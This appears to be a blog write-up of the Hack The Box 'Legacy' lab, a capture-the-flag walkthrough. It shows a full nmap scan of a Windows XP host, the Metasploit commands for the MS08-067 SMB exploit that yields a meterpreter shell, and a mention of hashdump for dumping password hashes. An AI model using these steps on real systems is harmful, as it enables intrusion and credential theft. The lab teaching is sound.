Legacy is the basic machine in [HTB]… I have started with enumeration and scanning.
I used nmap to find all open ports as below command
┌──(root💀kali)-[/home/kali]
└─# nmap -A -T4 -p- 10.10.10.4
Starting Nmap 7.91 ( https://nmap.org ) at 2021–06–28 15:33 EDT
Nmap scan report for 10.10.10.4
Host is up (0.14s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (92%), General Dynamics embedded (89%)
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP2 or Windows Small Business Server 2003 (92%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (92%), Microsoft Windows XP SP2 (92%), Microsoft Windows XP SP2 or SP3 (91%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2000 SP4 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP Professional SP2 (90%), Microsoft Windows XP SP2 or Windows Server 2003 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: -4h28m01s, deviation: 2h07m16s, median: -5h58m01s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:20:6e (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2021–06–28T19:37:35+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 142.30 ms 10.10.14.1
2 142.36 ms 10.10.10.4
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 199.63 seconds
I have decided to start with SMB and after I did a quick research on the google for smb windows XP vulnerabilities, I found rapid7 web site and all detail about this vulnerability and how it can be exploit with as follow;
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show targets ...targets... msf exploit(ms08_067_netapi) > set TARGET < target-id > msf exploit(ms08_067_netapi) > show options ...show and set options... msf exploit(ms08_067_netapi) > exploit or run
Hooray! I got meterpreter session after a lot of try. Actually, you may have hard time to create meterpreter session in HTB sometimes. Because the machine may be busy or restart by other users etc. after a day I successfully got in.
There is new feature of meterpreter to see what you can do with it is “help” command which is you can find useful tons of different interesting command which is brand new feature. For real pentesting I uses hashdump command to dump user name and password hashes.
Legacy is a very old windows computer so some commands may not work properly. In order to find the flag that HTB required we need to search around for user and root flag…
You may need to know following command if you don’t know windows command well like me;
> dir
>type
I did’t share the flag here for user and root. All you need to do is copy those flags and paste into the HTB submit flag field.
Disclaimer: This article is only meant for educational purposes. Any action that derives from this article which isn’t meant for educational purposes is not, by any means, supported by the author.
Follow me :
Twitter: https://twitter.com/DervishUludag